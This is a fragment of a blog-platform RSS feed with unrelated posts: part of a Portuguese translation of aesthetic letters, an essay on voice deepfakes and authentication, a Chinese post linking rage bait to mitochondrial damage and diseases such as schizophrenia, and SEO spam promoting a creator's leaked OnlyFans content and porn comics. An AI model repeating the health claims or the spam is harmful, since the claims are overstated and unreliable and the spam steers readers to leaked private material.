fechada, como se estivesse para além do espaço, sem ceder, sem oferecer resistência; ali não há força que combata outras forças, nem brecha por onde a temporalidade possa irromper. Irresistivelmente arrebatados e atraídos por um aspecto, mantidos à distância pelo outro, encontramo-nos ao mesmo tempo no estado do mais alto repouso e do mais alto movimento, e nasce aquela maravilhosa comoção para a qual o entendimento não possui conceito e a linguagem não possui nome.</p>

<h3 id="carta-dezesseis">Carta Dezesseis</h3>

<p>Da ação recíproca entre dois impulsos opostos e da união entre dois princípios opostos vimos surgir o belo, cujo mais alto ideal deverá, portanto, ser buscado na união e no equilíbrio mais perfeitos possíveis entre a realidade e a forma. Esse equilíbrio, porém, permanece sempre apenas uma ideia, que jamais pode ser plenamente alcançada na realidade. Na realidade, sempre subsistirá uma predominância de um dos elementos sobre o outro, e o máximo que a experiência pode oferecer consistirá em uma oscilação entre ambos os princípios, na qual ora predomina a realidade, ora a forma. A beleza na ideia é, portanto, eternamente una e indivisível, porque só pode haver um único equilíbrio; a beleza na experiência, ao contrário, será eternamente dupla, porque, em uma oscilação, o equilíbrio pode ser ultrapassado de duas maneiras, para um lado ou para o outro.</p>

<p>Observei em uma das cartas anteriores, e isso também pode ser rigorosamente deduzido da sequência do que foi exposto até aqui, que do belo se deve esperar, ao mesmo tempo, um efeito relaxante e um efeito tensionante: um efeito relaxante, para manter tanto o impulso sensível quanto o impulso formal dentro de seus limites; um efeito tensionante, para conservar ambos em toda a sua força. Segundo a ideia, porém, esses dois modos de ação da beleza devem constituir rigorosamente um único e mesmo efeito. Ela deve relaxar precisamente porque tensiona igualmente ambas as naturezas, e deve tensionar precisamente porque relaxa igualmente ambas as naturezas. Isso decorre já do próprio conceito de ação recíproca, segundo o qual ambas as partes se condicionam necessariamente uma à outra e são condicionadas uma pela outra, e cujo produto mais puro é a beleza. A experiência, entretanto, não nos oferece nenhum exemplo de uma ação recíproca tão perfeita; nela, sempre, em maior ou menor grau, uma predominância dará origem a uma deficiência, e a deficiência, por sua vez, a uma predominância. Assim, aquilo que, na beleza ideal, se distingue apenas no pensamento, na beleza da experiência apresenta-se como uma diferença real. A beleza ideal, embora indivisível e simples, manifesta, conforme a perspectiva, tanto uma propriedade relaxante quanto uma propriedade tensionante; na experiência, porém, existe uma beleza relaxante e uma beleza tensionante. Assim é, e assim será sempre, em todos os casos em que o absoluto é colocado dentro dos limites do tempo e as ideias da razão devem realizar-se na humanidade. Assim o homem reflexivo concebe a virtude, a verdade e a felicidade; mas o homem que age pratica apenas virtudes, apreende apenas verdades e desfruta apenas dias felizes. Reconduzir estas àquelas, substituir os costumes pela moralidade, os conhecimentos pelo conhecimento e a felicidade pela felicidade plena, é a tarefa da formação física e moral; fazer das belezas a beleza é a tarefa da formação estética.</p>

<p>A beleza tensionante é tão incapaz de preservar o homem de um certo resquício de selvageria e dureza quanto a beleza relaxante o é de protegê-lo de um certo grau de moleza e enfraquecimento. Pois, como o efeito da primeira consiste em tensionar o ânimo tanto física quanto moralmente e aumentar sua força de reação, acontece com demasiada facilidade que a resistência do temperamento e do caráter diminua a receptividade às impressões; que também a humanidade mais delicada sofra uma repressão que deveria atingir apenas a natureza bruta; e que esta participe de um acréscimo de força que deveria pertencer somente à pessoa livre. Por isso encontramos, nas épocas de vigor e de abundância, a verdadeira grandeza da imaginação associada ao gigantesco e ao aventureiro, e a elevação das disposições morais unida às mais terríveis explosões da paixão; por isso veremos, nas épocas da regra e da forma, a natureza ser reprimida com a mesma frequência com que é dominada, e ofendida com a mesma frequência com que é superada.</p>

<p>E, como o efeito da beleza relaxante consiste em relaxar o ânimo tanto moral quanto fisicamente, acontece com igual facilidade que, juntamente com a violência dos desejos, também a energia dos sentimentos seja sufocada, e que o próprio caráter compartilhe de uma perda de vigor que deveria atingir apenas a paixão. Por isso veremos, nas chamadas épocas refinadas, a delicadeza degenerar, não raramente, em moleza, a simplicidade em superficialidade, a correção em vazio, a liberalidade em arbitrariedade, a leveza em frivolidade e a tranquilidade em apatia, e veremos a mais desprezível caricatura confinar imediatamente com a mais elevada humanidade. Para o homem submetido ao jugo da matéria ou das formas, a beleza relaxante é uma necessidade, pois ele é tocado pela grandeza e pela força muito antes de se tornar sensível à harmonia e à graça. Para o homem entregue à indulgência do gosto, a beleza tensionante é uma necessidade, pois ele perde, com excessiva facilidade, no estado de refinamento, a força que trouxe consigo do estado de selvageria.</p>

<p>Creio agora ter explicado e resolvido aquela contradição que frequentemente se encontra nos juízos dos homens acerca da influência do belo e na apreciação da formação estética. Essa contradição se explica tão logo nos recordemos de que, na experiência, existem duas espécies de beleza, e que cada uma das partes atribui ao gênero inteiro apenas aquilo que é capaz de demonstrar de uma de suas espécies particulares. Essa contradição desaparece tão logo distinguimos a dupla necessidade da humanidade, à qual corresponde essa dupla beleza. Assim, é provável que ambas as partes tenham razão, desde que primeiro se entendam sobre qual espécie de beleza e qual forma de humanidade têm em mente.</p>

<p>Prosseguindo, portanto, em minhas investigações, adotarei também como meu o caminho que a natureza segue com o homem do ponto de vista estético e me elevarei das espécies de beleza ao conceito geral da beleza. Examinarei os efeitos da beleza relaxante sobre o homem tensionado e os efeitos da beleza tensionante sobre o homem distendido, para, por fim, dissolver essas duas espécies opostas de beleza na unidade da beleza ideal, assim como aquelas duas formas opostas de humanidade desaparecem na unidade do homem ideal.</p>
]]></content:encoded>
      <author>Nomos</author>
      <guid>https://infosec.press/read/a/d2jgh3nvmy</guid>
      <pubDate>Thu, 09 Jul 2026 07:15:50 +0000</pubDate>
    </item>
    <item>
      <title>AI-Generated Audio Is Improving Faster Than Our Trust Models</title>
      <link>https://infosec.press/cy520569/ai-generated-audio-is-improving-faster-than-our-trust-models</link>
      <description>&lt;![CDATA[For years, most conversations about AI-generated audio focused on productivity. Better voiceovers, faster content creation, multilingual narration, and automated customer support all sounded like obvious improvements.&#xA;&#xA;Recently, however, I found myself looking at the same technology from a completely different perspective.&#xA;&#xA;The more realistic AI-generated audio becomes, the less we should assume that a familiar voice represents a trusted identity.&#xA;&#xA;That shift has important implications for developers, security engineers, and anyone building applications that rely on spoken communication.&#xA;&#xA;Voice Was Never Designed to Be Authentication&#xA;&#xA;Many organizations still make informal security decisions based on voice.&#xA;&#xA;A manager leaves a voice message.&#xA;&#xA;A teammate sends an audio update.&#xA;&#xA;A customer support agent verifies information during a phone call.&#xA;&#xA;None of these workflows were originally designed as secure authentication methods, yet people often treat them that way.&#xA;&#xA;As synthetic speech becomes increasingly realistic, voice alone should no longer be considered sufficient proof of identity.&#xA;&#xA;The challenge isn&#39;t that AI can perfectly imitate every speaker.&#xA;&#xA;The challenge is that convincing audio is often &#34;good enough&#34; to influence human decisions.&#xA;&#xA;The Security Question Isn&#39;t &#34;Can AI Generate Audio?&#34;&#xA;&#xA;That question has already been answered.&#xA;&#xA;A more useful question is:&#xA;&#xA;How should systems be designed once realistic AI-generated audio becomes widely accessible?&#xA;&#xA;Instead of focusing only on generation quality, developers should also consider:&#xA;&#xA;Can users distinguish synthetic audio from recorded speech?&#xA;Should important voice instructions require a second verification step?&#xA;Can generated audio be traced back to its source?&#xA;How should organizations log AI-generated media?&#xA;&#xA;These questions belong in software architecture discussions—not only security audits.&#xA;&#xA;Prompt Engineering Has Security Implications&#xA;&#xA;One interesting observation from my own experiments is that prompt design affects more than creative quality.&#xA;&#xA;A vague prompt often produces inconsistent results.&#xA;&#xA;A carefully structured prompt can generate speech that sounds significantly more coherent and believable.&#xA;&#xA;As prompt engineering continues to improve, defensive thinking needs to evolve alongside it.&#xA;&#xA;Security reviews should evaluate not only model capabilities but also how those capabilities could be misused in real-world workflows.&#xA;&#xA;Practical Design Principles&#xA;&#xA;Developers building applications with AI-generated speech should consider a few practical safeguards:&#xA;&#xA;Clearly indicate when audio is synthetic.&#xA;Avoid using voice alone for identity verification.&#xA;Keep audit logs for generated media.&#xA;Require multi-factor confirmation for sensitive requests.&#xA;Educate users that realistic audio should not automatically be trusted.&#xA;&#xA;None of these measures eliminate risk, but together they reduce opportunities for social engineering.&#xA;&#xA;Technology Is Neutral—System Design Is Not&#xA;&#xA;While exploring modern AI audio generation workflows, I experimented with Seed Audio 1.0 to better understand how prompt-driven dialogue, ambient sound, and background audio can be generated within a single workflow.&#xA;&#xA;The experiment reinforced an important conclusion.&#xA;&#xA;The technology itself is neither trustworthy nor dangerous.&#xA;&#xA;Security depends on the surrounding system: how generated content is labeled, how identity is verified, and how people are trained to evaluate increasingly convincing synthetic media.&#xA;&#xA;Final Thoughts&#xA;&#xA;Generative AI will continue to make digital communication faster, cheaper, and more accessible.&#xA;&#xA;At the same time, it challenges one of our oldest assumptions—that hearing a familiar voice is enough to establish trust.&#xA;&#xA;For developers and security professionals, the goal should not be resisting AI-generated audio.&#xA;&#xA;The goal should be building systems that remain trustworthy even when realistic synthetic audio becomes an everyday part of the internet.&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>For years, most conversations about AI-generated audio focused on productivity. Better voiceovers, faster content creation, multilingual narration, and automated customer support all sounded like obvious improvements.</p>

<p>Recently, however, I found myself looking at the same technology from a completely different perspective.</p>

<p>The more realistic AI-generated audio becomes, the less we should assume that a familiar voice represents a trusted identity.</p>

<p>That shift has important implications for developers, security engineers, and anyone building applications that rely on spoken communication.</p>

<h2 id="voice-was-never-designed-to-be-authentication">Voice Was Never Designed to Be Authentication</h2>

<p>Many organizations still make informal security decisions based on voice.</p>

<p>A manager leaves a voice message.</p>

<p>A teammate sends an audio update.</p>

<p>A customer support agent verifies information during a phone call.</p>

<p>None of these workflows were originally designed as secure authentication methods, yet people often treat them that way.</p>

<p>As synthetic speech becomes increasingly realistic, voice alone should no longer be considered sufficient proof of identity.</p>

<p>The challenge isn&#39;t that AI can perfectly imitate every speaker.</p>

<p>The challenge is that convincing audio is often “good enough” to influence human decisions.</p>

<h2 id="the-security-question-isn-t-can-ai-generate-audio">The Security Question Isn&#39;t “Can AI Generate Audio?”</h2>

<p>That question has already been answered.</p>

<p>A more useful question is:</p>

<p><strong>How should systems be designed once realistic AI-generated audio becomes widely accessible?</strong></p>

<p>Instead of focusing only on generation quality, developers should also consider:</p>
<ul><li>Can users distinguish synthetic audio from recorded speech?</li>
<li>Should important voice instructions require a second verification step?</li>
<li>Can generated audio be traced back to its source?</li>
<li>How should organizations log AI-generated media?</li></ul>

<p>These questions belong in software architecture discussions—not only security audits.</p>

<h2 id="prompt-engineering-has-security-implications">Prompt Engineering Has Security Implications</h2>

<p>One interesting observation from my own experiments is that prompt design affects more than creative quality.</p>

<p>A vague prompt often produces inconsistent results.</p>

<p>A carefully structured prompt can generate speech that sounds significantly more coherent and believable.</p>

<p>As prompt engineering continues to improve, defensive thinking needs to evolve alongside it.</p>

<p>Security reviews should evaluate not only model capabilities but also how those capabilities could be misused in real-world workflows.</p>

<h2 id="practical-design-principles">Practical Design Principles</h2>

<p>Developers building applications with AI-generated speech should consider a few practical safeguards:</p>
<ul><li>Clearly indicate when audio is synthetic.</li>
<li>Avoid using voice alone for identity verification.</li>
<li>Keep audit logs for generated media.</li>
<li>Require multi-factor confirmation for sensitive requests.</li>
<li>Educate users that realistic audio should not automatically be trusted.</li></ul>

<p>None of these measures eliminate risk, but together they reduce opportunities for social engineering.</p>

<h2 id="technology-is-neutral-system-design-is-not">Technology Is Neutral—System Design Is Not</h2>

<p>While exploring modern AI audio generation workflows, I experimented with <a href="https://seedaudio1.app" rel="nofollow">Seed Audio 1.0</a> to better understand how prompt-driven dialogue, ambient sound, and background audio can be generated within a single workflow.</p>

<p>The experiment reinforced an important conclusion.</p>

<p>The technology itself is neither trustworthy nor dangerous.</p>

<p>Security depends on the surrounding system: how generated content is labeled, how identity is verified, and how people are trained to evaluate increasingly convincing synthetic media.</p>

<h2 id="final-thoughts">Final Thoughts</h2>

<p>Generative AI will continue to make digital communication faster, cheaper, and more accessible.</p>

<p>At the same time, it challenges one of our oldest assumptions—that hearing a familiar voice is enough to establish trust.</p>

<p>For developers and security professionals, the goal should not be resisting AI-generated audio.</p>

<p>The goal should be building systems that remain trustworthy even when realistic synthetic audio becomes an everyday part of the internet.</p>
]]></content:encoded>
      <author>cy520569</author>
      <guid>https://infosec.press/read/a/tovzqraycm</guid>
      <pubDate>Thu, 09 Jul 2026 05:48:02 +0000</pubDate>
    </item>
    <item>
      <title>演算法如何用 Rage Bait 操弄那可憐的粒線體，點進來啊，憤怒的藍腦小草！</title>
      <link>https://infosec.press/dong-fang-liu-li-jing-tu/bluebrain</link>
      <description>&lt;![CDATA[你以為只是隨手滑到一則讓人火大的智障貼文？這正是精心設計來玩你的陷阱！那些刻意挑起你憤怒與不安的「憤怒誘餌」（Rage Bait），目的就是要把你這根雜草，長時間圈在負面情緒裡當流量韭菜。&#xA;&#xA;這場看似只發生在螢幕上的心理戰，mark每天都在你體內點燃大量的腎上腺素/mark，讓你的細胞陷入無謂的超載空轉。本文將從粒線體科學的「能量阻抗」視角，拆解網路上的刻意訊息如何一步步引發慢性發炎、吞噬你的身體動力，最終演變成摧毀你整具實體身體的慢性疾病。最喜歡被操弄就集體高潮的低級知識份子們了 xd&#xA;&#xA;!--more--&#xA;---&#xA;&#xA;目錄&#xA;&#xA;三個關於能量的破壞事實&#xA;能量阻抗：一個公式串起糖尿病、癌症與阿茲海默症&#xA;網路惡意訊息與 Rage Bait：壓力如何摧毀你的身體&#xA;&#xA;---&#xA;&#xA;div id=&#34;basics&#34;/div三個關於能量的破壞事實&#xA;&#xA;Martin Picard 是哥倫比亞大學的粒線體生物學家，他指出關於能量在人體裡如何運作、又是如何被破壞，有三件最基礎的事。&#xA;&#xA;第一：當能量停止流動，生命即告結束。 一具屍體和一個活生生、會思考的人之間，差別就是能量的流動。當能量流動受阻或停止，身體的功能就會崩解。&#xA;&#xA;第二：你有一份固定的能量預算。 系統的總能量是有限的。硬把太多能量（尤其是糖）塞進系統，就像把電壓調得太高，系統會開始過熱——發炎（inflammation）本質上就是這種能量過剩、系統過熱的破壞訊號。&#xA;&#xA;第三：錯誤的阻抗會引發系統潰散。 當能量在體內遇到無法疏導的屏障，就會轉化成對組織的破壞。&#xA;&#xA;回目錄&#xA;&#xA;---&#xA;&#xA;div id=&#34;resistance&#34;/div能量阻抗：一個公式串起糖尿病、癌症與阿茲海默症&#xA;&#xA;Picard 說，很多疾病都可以用「能量阻抗」（energy resistance）來理解。他給的定義很簡單：&#xA;&#xA;|要素|意義|&#xA;|---|---|&#xA;|能量需求（demand）|某個組織、細胞正在消耗多少能量|&#xA;|流動能力（flow capacity）|系統實際能讓多少能量順暢流過|&#xA;|能量阻抗|需求 ÷ 流動能力|&#xA;&#xA;當需求很高、但流動能力跟不上，阻抗就飆高。能量像水流，如果前面有一道完全沒有洩洪口的壩，水就會累積、壓力升高，最後淹過堤岸、破壞四周。&#xA;&#xA;糖尿病是最清楚的例子。如果你長期把太多糖（電子）推進系統，肌肉細胞為了自保，會把表面的胰島素受體「拔掉」——變得對胰島素不敏感。這會導致血糖升高、脂肪堆積。因此，肥胖本質上是身體對抗「能量阻抗過高」所產生的病理症狀。&#xA;&#xA;癌症則呈現另一種面貌。癌細胞會「拋棄」自己的粒線體，退回到厭氧、只顧自己複製的狀態。正常情況下，粒線體能在細胞出問題時觸發它自殺；但癌細胞藉由拋棄粒線體，等於讓自己對這種自我清除的指令免疫，進而演變成惡性腫瘤。&#xA;&#xA;阿茲海默症也是一種能量流動受阻的狀態。在早期，某些特定腦區的能量需求會過度代謝，這會讓腦區「累壞」，隨後轉為能量不足與代謝低下。這時大腦不只燒的能量變少，葡萄糖也更難進入腦中被利用，症狀便全面浮現。&#xA;&#xA;回目錄&#xA;&#xA;---&#xA;&#xA;div id=&#34;stress&#34;/div網路精準訊息與 Rage Bait：壓力如何摧毀你的身體&#xA;&#xA;當你在社群中面臨威脅，身體的細胞會受到壓力荷爾蒙——腎上腺素的訊號驅使，讓能量消耗大幅暴增。&#xA;&#xA;現代人最嚴重的慢性破壞，往往來自數位環境。例如：有人在網路上刻意發布訊息要給你看，內容可能是你非常不喜歡的內容，或是精心設計的「憤怒誘餌」（rage bait）。 當你看到這些訊息，你的心理會立刻產生一個故事，並在體內點燃大量的腎上腺素。此時，細胞被迫進入高度戒備，血液裡一個名為 GDF15 的能量壓力標記就會隨之飆升。&#xA;&#xA;這條破壞鏈的關鍵在於：mark這些網路機制會長時間把你圈在裡面，長時間強迫你注意到這些惡意訊息，刻意引起你的負面情緒，目的是一定要讓你做出反應。/mark&#xA;&#xA;當這種狀態變成慢性化，長期累積的 GDF15 會直接對大腦與身體下達錯誤指令：&#xA;&#xA;阻斷動力：大腦會誤以為某個地方快沒能量了，讓你失去動力、感覺憂鬱、陷入「生病行為」，使你整個人長期處於慢性疲勞中。&#xA;錯誤囤積能量：大腦會把葡萄糖和脂肪送進血液，由於身體根本沒有實際的體力活動去消耗，這些脂肪就會囤積在內臟，變成有害的腹部脂肪。&#xA;&#xA;這種因 rage bait 引起的慢性緊繃，會連續好幾週、好幾個月揮之不去。長期下來，體內的粒線體會因為這種無謂的空轉與能量阻抗而壞死，最終破壞整具身體，引發思覺失調、心血管疾病、高血壓，甚至提高整體的死亡風險。&#xA;&#xA;  而且要小心，有人會用Agentic AI，來跟你玩 XD&#xA;&#xA;回目錄]]&gt;</description>
      <content:encoded><![CDATA[<p>你以為只是隨手滑到一則讓人火大的智障貼文？這正是精心設計來玩你的陷阱！那些刻意挑起你憤怒與不安的「憤怒誘餌」（Rage Bait），目的就是要把你這根雜草，長時間圈在負面情緒裡當流量韭菜。</p>

<p>這場看似只發生在螢幕上的心理戰，<mark>每天都在你體內點燃大量的腎上腺素</mark>，讓你的細胞陷入無謂的超載空轉。本文將從粒線體科學的「能量阻抗」視角，拆解網路上的刻意訊息如何一步步引發慢性發炎、吞噬你的身體動力，最終演變成摧毀你整具實體身體的慢性疾病。最喜歡被操弄就集體高潮的低級知識份子們了 xd</p>

<p><img src="https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/888/436/029/801/324/original/96c628e285e33d81.png" alt=""></p>



<hr>

<h2 id="目錄">目錄</h2>
<ul><li><a href="#basics" rel="nofollow">三個關於能量的破壞事實</a></li>
<li><a href="#resistance" rel="nofollow">能量阻抗：一個公式串起糖尿病、癌症與阿茲海默症</a></li>
<li><a href="#stress" rel="nofollow">網路惡意訊息與 Rage Bait：壓力如何摧毀你的身體</a></li></ul>

<hr>

<h2 id="div-id-basics-div-三個關於能量的破壞事實"><div id="basics"></div>三個關於能量的破壞事實</h2>

<p>Martin Picard 是哥倫比亞大學的粒線體生物學家，他指出關於能量在人體裡如何運作、又是如何被破壞，有三件最基礎的事。</p>

<p><strong>第一：當能量停止流動，生命即告結束。</strong> 一具屍體和一個活生生、會思考的人之間，差別就是能量的流動。當能量流動受阻或停止，身體的功能就會崩解。</p>

<p><strong>第二：你有一份固定的能量預算。</strong> 系統的總能量是有限的。硬把太多能量（尤其是糖）塞進系統，就像把電壓調得太高，系統會開始過熱——發炎（inflammation）本質上就是這種能量過剩、系統過熱的破壞訊號。</p>

<p><strong>第三：錯誤的阻抗會引發系統潰散。</strong> 當能量在體內遇到無法疏導的屏障，就會轉化成對組織的破壞。</p>

<p><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回目錄</a></p>

<hr>

<h2 id="div-id-resistance-div-能量阻抗-一個公式串起糖尿病-癌症與阿茲海默症"><div id="resistance"></div>能量阻抗：一個公式串起糖尿病、癌症與阿茲海默症</h2>

<p>Picard 說，很多疾病都可以用「能量阻抗」（energy resistance）來理解。他給的定義很簡單：</p>

<table>
<thead>
<tr>
<th>要素</th>
<th>意義</th>
</tr>
</thead>

<tbody>
<tr>
<td>能量需求（demand）</td>
<td>某個組織、細胞正在消耗多少能量</td>
</tr>

<tr>
<td>流動能力（flow capacity）</td>
<td>系統實際能讓多少能量順暢流過</td>
</tr>

<tr>
<td><strong>能量阻抗</strong></td>
<td><strong>需求 ÷ 流動能力</strong></td>
</tr>
</tbody>
</table>

<p>當需求很高、但流動能力跟不上，阻抗就飆高。能量像水流，如果前面有一道完全沒有洩洪口的壩，水就會累積、壓力升高，最後淹過堤岸、破壞四周。</p>

<p><strong>糖尿病</strong>是最清楚的例子。如果你長期把太多糖（電子）推進系統，肌肉細胞為了自保，會把表面的胰島素受體「拔掉」——變得對胰島素不敏感。這會導致血糖升高、脂肪堆積。因此，肥胖本質上是身體對抗「能量阻抗過高」所產生的病理症狀。</p>

<p><strong>癌症</strong>則呈現另一種面貌。癌細胞會「拋棄」自己的粒線體，退回到厭氧、只顧自己複製的狀態。正常情況下，粒線體能在細胞出問題時觸發它自殺；但癌細胞藉由拋棄粒線體，等於讓自己對這種自我清除的指令免疫，進而演變成惡性腫瘤。</p>

<p><strong>阿茲海默症</strong>也是一種能量流動受阻的狀態。在早期，某些特定腦區的能量需求會過度代謝，這會讓腦區「累壞」，隨後轉為能量不足與代謝低下。這時大腦不只燒的能量變少，葡萄糖也更難進入腦中被利用，症狀便全面浮現。</p>

<p><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回目錄</a></p>

<hr>

<h2 id="div-id-stress-div-網路精準訊息與-rage-bait-壓力如何摧毀你的身體"><div id="stress"></div>網路精準訊息與 Rage Bait：壓力如何摧毀你的身體</h2>

<p>當你在社群中面臨威脅，身體的細胞會受到壓力荷爾蒙——<strong>腎上腺素</strong>的訊號驅使，讓能量消耗大幅暴增。</p>

<p>現代人最嚴重的慢性破壞，往往來自數位環境。例如：<strong>有人在網路上刻意發布訊息要給你看，內容可能是你非常不喜歡的內容，或是精心設計的「憤怒誘餌」（rage bait）。</strong> 當你看到這些訊息，你的心理會立刻產生一個故事，並在體內點燃大量的<strong>腎上腺素</strong>。此時，細胞被迫進入高度戒備，血液裡一個名為 <strong>GDF15</strong> 的能量壓力標記就會隨之飆升。</p>

<p>這條破壞鏈的關鍵在於：<mark><strong>這些網路機制會長時間把你圈在裡面，長時間強迫你注意到這些惡意訊息，刻意引起你的負面情緒，目的是一定要讓你做出反應。</strong></mark></p>

<p>當這種狀態變成慢性化，長期累積的 GDF15 會直接對大腦與身體下達錯誤指令：</p>
<ol><li><strong>阻斷動力</strong>：大腦會誤以為某個地方快沒能量了，讓你失去動力、感覺憂鬱、陷入「生病行為」，使你整個人長期處於慢性疲勞中。</li>
<li><strong>錯誤囤積能量</strong>：大腦會把葡萄糖和脂肪送進血液，由於身體根本沒有實際的體力活動去消耗，這些脂肪就會囤積在內臟，變成有害的腹部脂肪。</li></ol>

<p>這種因 rage bait 引起的慢性緊繃，會連續好幾週、好幾個月揮之不去。長期下來，體內的粒線體會因為這種無謂的空轉與能量阻抗而壞死，最終破壞整具身體，引發思覺失調、心血管疾病、高血壓，甚至提高整體的死亡風險。</p>

<blockquote><p>而且要小心，有人會用Agentic AI，來跟你玩 XD</p></blockquote>

<p><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回目錄</a></p>
]]></content:encoded>
      <author>東方琉璃淨土</author>
      <guid>https://infosec.press/read/a/z3ve39lw3n</guid>
      <pubDate>Thu, 09 Jul 2026 05:45:28 +0000</pubDate>
    </item>
    <item>
      <title>Elowen Clown OnlyFans Leak: What to Know About the Viral Topic</title>
      <link>https://infosec.press/stepanarnold49/elowen-clown-onlyfans-leak-what-to-know-about-the-viral-topic</link>
      <description>&lt;![CDATA[Elowen Clown OnlyFans Leak: What to Know About the Viral Topic&#xA;&#xA;-  Read the full collection at dalgomz.com&#xA;&#xA;The name Elowen has become a widely searched term across multiple online platforms in recent weeks. Operating under the handle sora.elowen, this content creator has attracted significant attention as discussions about the elowen clown onlyfans leak have spread through various online communities. The situation has drawn curiosity from internet users worldwide who are seeking to understand the circumstances surrounding this case.&#xA;&#xA;Understanding the Elowen Clown OnlyFans Leak&#xA;&#xA;The elowen clown onlyfans leak refers to the unauthorized distribution of content originally published on a subscription-based platform. Content creators like Elowen rely on these platforms to share exclusive material directly with their paying subscribers. When private content is leaked and redistributed without consent, it raises complex questions about digital privacy, platform security, and the ethical framework governing content sharing online.&#xA;&#xA;The specific references to clown-themed content have become a distinguishing characteristic of this particular leak, contributing to its viral spread across social media and content aggregation sites. The novelty of the theme combined with the broader interest in leaked creator content has driven sustained search interest.&#xA;&#xA;Broader Context for Creator Content Leaks&#xA;&#xA;The case of Elowen is representative of a recurring challenge facing digital creators. Subscription platforms have grown rapidly, and with that growth comes increased risk of unauthorized content distribution. Many creators have reported similar experiences where their exclusive content was captured, copied, and reposted across various websites without permission.&#xA;&#xA;Discussion of these leaks typically spreads through multiple channels: social media platforms, messaging applications, dedicated forums, and content aggregation websites. The speed at which digital content can be replicated and redistributed presents ongoing challenges for creators trying to protect their intellectual property.&#xA;&#xA;Why This Topic Continues to Trend&#xA;&#xA;Several factors contribute to the continued search interest around the elowen clown onlyfans leak. The distinctive nature of the content theme has made it stand out in a crowded landscape of online discussions. Additionally, ongoing commentary in social media communities keeps the topic circulating. The broader conversation about content creator rights and digital privacy ensures that notable cases like this remain in the public conversation.&#xA;&#xA;For those seeking more comprehensive coverage of this developing story, dedicated sources provide detailed information and ongoing updates about the situation and its wider implications for digital content distribution.&#xA;&#xA;To learn more, visit dalgomz.com.]]&gt;</description>
      <content:encoded><![CDATA[<p>Elowen Clown OnlyFans Leak: What to Know About the Viral Topic</p>

<p>–&gt; Read the full collection at <a href="https://dalgomz.com/elowen+clown+onlyfans+leak?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=elowen-clown-onlyfans-leak&amp;utm_content=ptask_mr2c61vb14ez8q" rel="nofollow">dalgomz.com</a></p>

<p>The name Elowen has become a widely searched term across multiple online platforms in recent weeks. Operating under the handle sora.elowen, this content creator has attracted significant attention as discussions about the elowen clown onlyfans leak have spread through various online communities. The situation has drawn curiosity from internet users worldwide who are seeking to understand the circumstances surrounding this case.</p>

<h2 id="understanding-the-elowen-clown-onlyfans-leak">Understanding the Elowen Clown OnlyFans Leak</h2>

<p>The elowen clown onlyfans leak refers to the unauthorized distribution of content originally published on a subscription-based platform. Content creators like Elowen rely on these platforms to share exclusive material directly with their paying subscribers. When private content is leaked and redistributed without consent, it raises complex questions about digital privacy, platform security, and the ethical framework governing content sharing online.</p>

<p>The specific references to clown-themed content have become a distinguishing characteristic of this particular leak, contributing to its viral spread across social media and content aggregation sites. The novelty of the theme combined with the broader interest in leaked creator content has driven sustained search interest.</p>

<h2 id="broader-context-for-creator-content-leaks">Broader Context for Creator Content Leaks</h2>

<p>The case of Elowen is representative of a recurring challenge facing digital creators. Subscription platforms have grown rapidly, and with that growth comes increased risk of unauthorized content distribution. Many creators have reported similar experiences where their exclusive content was captured, copied, and reposted across various websites without permission.</p>

<p>Discussion of these leaks typically spreads through multiple channels: social media platforms, messaging applications, dedicated forums, and content aggregation websites. The speed at which digital content can be replicated and redistributed presents ongoing challenges for creators trying to protect their intellectual property.</p>

<h2 id="why-this-topic-continues-to-trend">Why This Topic Continues to Trend</h2>

<p>Several factors contribute to the continued search interest around the elowen clown onlyfans leak. The distinctive nature of the content theme has made it stand out in a crowded landscape of online discussions. Additionally, ongoing commentary in social media communities keeps the topic circulating. The broader conversation about content creator rights and digital privacy ensures that notable cases like this remain in the public conversation.</p>

<p>For those seeking more comprehensive coverage of this developing story, dedicated sources provide detailed information and ongoing updates about the situation and its wider implications for digital content distribution.</p>

<p>To learn more, visit <a href="https://dalgomz.com/elowen+clown+onlyfans+leak?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=elowen-clown-onlyfans-leak&amp;utm_content=ptask_mr2c61vb14ez8q" rel="nofollow">dalgomz.com</a>.</p>
]]></content:encoded>
      <author>Frances Campbell</author>
      <guid>https://infosec.press/read/a/z795kmwabw</guid>
      <pubDate>Wed, 01 Jul 2026 17:23:42 +0000</pubDate>
    </item>
    <item>
      <title>Porn Comics Femboy: Understanding the Search Trend</title>
      <link>https://infosec.press/stepanarnold49/porn-comics-femboy-understanding-the-search-trend</link>
      <description>&lt;![CDATA[Porn Comics Femboy: Understanding the Search Trend&#xA;&#xA;The term &#34;porn comics femboy&#34; has gained significant traction across various online platforms, reflecting a specific niche interest within the broader landscape of digital content consumption. View the source page at tsai-yi.tw (https://tsai-yi.tw/porn+comics+femboy?utmsource=parasite&amp;utmmedium=infosec.press&amp;utmcampaign=porn-comics-femboy&amp;utmcontent=ptaskmr2a0vhsodt9wd) for a comprehensive collection of related material.&#xA;&#xA;Background and Context&#xA;&#xA;The femboy genre within illustrated comics represents a distinct category that has developed its own following across the internet. Content featuring femboy characters appears across multiple platforms, from dedicated comic hosting sites to fan art communities. Artists contributing to this space include creators such as Red7cat, Dross, and Shadbase, whose works have become reference points within the genre. Series like &#34;Back At The Farm&#34; and &#34;See Ya Later Boi 2&#34; exemplify the ongoing production of content in this category.&#xA;&#xA;Online Communities and Distribution&#xA;&#xA;These comics circulate through various channels including dedicated adult comic platforms, art aggregation sites, and fan communities. The content is typically shared across image hosting services, specialized comic repositories, and social media platforms. Search interest around this topic tends to spike in correlation with new releases from popular artists and the viral spread of specific character designs across fandom networks.&#xA;&#xA;The Digital Landscape&#xA;&#xA;The demand for femboy-themed illustrated content reflects broader shifts in how niche adult entertainment is produced and consumed online. Independent artists can now distribute their work directly to audiences through subscription platforms and pay-per-view models, bypassing traditional publishing channels. This ecosystem has enabled the growth of a vibrant creative community producing specialized content for dedicated audiences.&#xA;&#xA;For the full collection, visit tsai-yi.tw (https://tsai-yi.tw/porn+comics+femboy?utmsource=parasite&amp;utmmedium=infosec.press&amp;utmcampaign=porn-comics-femboy&amp;utmcontent=ptaskmr2a0vhsodt9wd).&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>Porn Comics Femboy: Understanding the Search Trend</p>

